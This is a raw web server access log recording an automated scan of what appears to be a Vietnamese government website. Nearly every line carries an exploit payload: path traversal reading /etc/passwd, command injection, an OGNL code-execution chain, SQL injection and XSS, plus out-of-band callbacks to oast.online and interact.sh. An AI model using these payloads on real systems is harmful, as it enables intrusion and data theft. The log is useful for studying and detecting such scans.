2023-10-13 06:56:07 103.153.214.94 GET /cgi-bin/ExportAllSettings.sh - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 06:56:51 103.153.214.94 GET /files/ldap.debug.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207
2023-10-13 06:59:07 103.153.214.94 POST /ajax/api/content_infraction/getIndexableContent - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 201
2023-10-13 07:00:26 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 201
2023-10-13 07:00:58 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 202
2023-10-13 07:01:00 103.153.214.94 GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2WfF0d8oGeKcEtvZxTl0ofw5wiZ.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 199
2023-10-13 07:01:58 103.153.214.94 GET /fw.progrss.details.php popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201
2023-10-13 07:03:01 103.153.214.94 GET /webadmin/tools/unixlogin.php login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6c646d526a426a616e6c49596b354864323948626a5a56536d5a3054465a6d61444a7322207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn/webadmin/admin/service_manager_data.php 200 0 0 202
2023-10-13 07:03:02 103.153.214.94 GET /webadmin/out - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn/webadmin/admin/service_manager_data.php 200 0 0 198
2023-10-13 07:07:27 103.153.214.94 GET / cda'"</script><script>alert(document.domain)</script>&locale=locale=de-DE 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 07:09:09 103.153.214.94 GET /avatar/1?d=http:%2F%2Fimgur.com%2F..%252F1.1.1.1 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 11 0 200
2023-10-13 07:11:24 103.153.214.94 POST /module/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vnadmin/view:modules/load_module:users 405 0 1 199
2023-10-13 07:11:26 103.153.214.94 POST /module/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 https://bcvt.kontum.gov.vnadmin/view:modules/load_module:users 405 0 1 198
2023-10-13 07:11:28 103.153.214.94 POST /module/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vnadmin/view:modules/load_module:users 405 0 1 197
2023-10-13 07:11:29 103.153.214.94 GET /bitrix/components/bitrix/mobileapp.list/ajax.php/ AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 07:11:31 103.153.214.94 GET /bitrix/components/bitrix/mobileapp.list/ajax.php/ AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 07:12:57 103.153.214.94 GET /wp-json/acf/v3/options/a id=active&field=plugins 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 201
2023-10-13 07:14:40 103.153.214.94 GET /OneView/view/center a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 200
2023-10-13 07:15:12 103.153.214.94 GET /api/experimental/latest_runs - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 0 2 210
2023-10-13 07:15:15 103.153.214.94 GET /kylin/api/admin/config - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 07:16:32 103.153.214.94 POST /context.json - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 199
2023-10-13 07:17:19 103.153.214.94 GET / cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 210
2023-10-13 07:17:23 103.153.214.94 POST /apisix/admin/routes - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 0 2 205
2023-10-13 07:17:25 103.153.214.94 GET /2WfF0fukp4rr0gh3yyBWnFryAKX cmd=id 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 199
2023-10-13 07:18:45 103.153.214.94 GET /user/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 200
2023-10-13 07:19:43 103.153.214.94 GET /secure/QueryComponent!Default.jspa - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 201
2023-10-13 07:20:10 103.153.214.94 GET /secure/ViewUserHover.jspa - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 618
2023-10-13 07:22:15 103.153.214.94 GET /auth/login to=/92874%27;alert(document.domain)//280 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 204
2023-10-13 07:23:08 103.153.214.94 GET /Devices-Config.php sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 199
2023-10-13 07:27:49 103.153.214.94 POST /console/css/%2e%2e%2fconsole.portal - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 11 0 846
2023-10-13 07:28:37 103.153.214.94 GET /console/images/%2e%2e%2fconsole.portal _nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://ckjv7uic8b6p3donsoogcwr4fnfqh3u6p.oast.online') 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 11 0 202
2023-10-13 07:29:23 103.153.214.94 GET /analytics/saw.dll bieehome&startPage=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 200
2023-10-13 07:29:25 103.153.214.94 GET /analytics/saw.dll getPreviewImage&previewFilePath=/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 198
2023-10-13 07:32:26 103.153.214.94 POST /console/images/%2e%2e%2fconsole.portal - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 11 0 200
2023-10-13 07:34:40 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 211
2023-10-13 07:34:47 103.153.214.94 GET /index.php r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 204
2023-10-13 07:36:57 103.153.214.94 GET /nette.micro/ callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 202
2023-10-13 07:38:15 103.153.214.94 GET / key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 07:39:19 103.153.214.94 POST /mifs/.;/services/LogService - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn 405 0 1 199
2023-10-13 07:40:11 103.153.214.94 GET /user/login - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 204
2023-10-13 07:40:25 103.153.214.94 GET /include/exportUser.php type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Evmws.txt 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 199
2023-10-13 07:40:27 103.153.214.94 GET /include/vmws.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 198
2023-10-13 07:41:59 103.153.214.94 GET /info.php RESULT=",msgArray);alert(document.domain);// 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200
2023-10-13 07:42:07 103.153.214.94 POST /PDC/ajaxreq.php PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 787
2023-10-13 07:42:40 103.153.214.94 POST /run - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 200
2023-10-13 07:44:56 103.153.214.94 GET / s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 208
2023-10-13 07:45:27 103.153.214.94 GET /carbon/admin/login.jsp msgId=%27%3Balert(%27document.domain%27)%2F%2F 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200
2023-10-13 07:47:06 103.153.214.94 POST /cgi-bin/login.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 869
2023-10-13 07:47:08 103.153.214.94 POST /cgi-bin/system_log.cgi - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 198
2023-10-13 07:48:47 103.153.214.94 POST /ajax/render/widget_tabbedcontainer_tab_panel - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 203
2023-10-13 07:49:43 103.153.214.94 GET /fuel/login/ - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 204
2023-10-13 07:49:46 103.153.214.94 POST /fuel/login/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 198
2023-10-13 07:49:48 103.153.214.94 GET /fuel/pages/items/ search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn 200 0 0 198
2023-10-13 07:50:32 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 199
2023-10-13 07:50:33 103.153.214.94 GET /cyrus.index.php service-cmds-peform=%7C%7Cwhoami%7C%7C 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 205
2023-10-13 07:52:39 103.153.214.94 GET /fw.login.php apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 198
2023-10-13 07:54:17 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 11 0 199
2023-10-13 07:54:51 103.153.214.94 POST /jars/upload - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 199
2023-10-13 07:54:52 103.153.214.94 GET /jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpoc - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 11 0 197
2023-10-13 07:55:50 103.153.214.94 GET /admin/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 204
2023-10-13 07:55:51 103.153.214.94 GET /admin/ - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 202
2023-10-13 07:56:06 103.153.214.94 GET / id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 202
2023-10-13 07:56:49 103.153.214.94 GET /error msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 208
2023-10-13 07:58:25 103.153.214.94 GET /newVersion callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 202
2023-10-13 07:59:01 103.153.214.94 GET /weibo/topic/</script><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 08:01:36 103.153.214.94 GET /fhem/FileLog_logWrapper dev=Logfile&file=%2fetc%2fpasswd&type=text 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 212
2023-10-13 08:01:55 103.153.214.94 GET /control/stream contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 199
2023-10-13 08:01:56 103.153.214.94 GET /install/index.php step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/> 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 198
2023-10-13 08:04:44 103.153.214.94 GET /tests/support/stores/test_grid_filter.php query=echo%20md5%28%22CVE-2020-19625%22%29%3B 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 200
2023-10-13 08:05:20 103.153.214.94 GET /user/login.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 xss"/><img+src="#"+onerror="alert(document.domain)"/> 200 0 0 202
2023-10-13 08:05:32 103.153.214.94 POST /public/index.php/home/index/bind_follow/ publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--++ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 199
2023-10-13 08:07:43 103.153.214.94 GET /gitlab/build_now</script><script>alert(document.domain)</script> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 207
2023-10-13 08:07:58 103.153.214.94 GET /passport/index.php action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 200
2023-10-13 08:10:28 103.153.214.94 POST /forgot_password.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 204
2023-10-13 08:14:01 103.153.214.94 GET /whoAmI/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 200
2023-10-13 08:14:04 103.153.214.94 GET /whoAmI/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 197
2023-10-13 08:14:45 103.153.214.94 POST /login - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 bcvt.kontum.gov.vn/module/login/login.html 405 0 1 202
2023-10-13 08:16:50 103.153.214.94 GET /plus/ajax_street.php act=alphabet&x=11%ef%bf%bd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5(999999999),9%20from%20qs_admin 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 201
2023-10-13 08:16:59 103.153.214.94 GET /descriptorByName/AuditTrailPlugin/regexCheck value=*j%3Ch1%3Esample 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 199
2023-10-13 08:17:01 103.153.214.94 GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck value=*j%3Ch1%3Esample 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 199
2023-10-13 08:18:04 103.153.214.94 GET /plus/ajax_common.php act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 202
2023-10-13 08:18:23 103.153.214.94 GET /plus/ajax_officebuilding.php act=key&key=%e9%8c%a6%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5(999999999),5,6,7,8,9%23 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 203
2023-10-13 08:18:44 103.153.214.94 GET /plus/ajax_street.php act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(999999999),9%23 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 199
2023-10-13 08:19:01 103.153.214.94 GET /email_passthrough.php email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 198
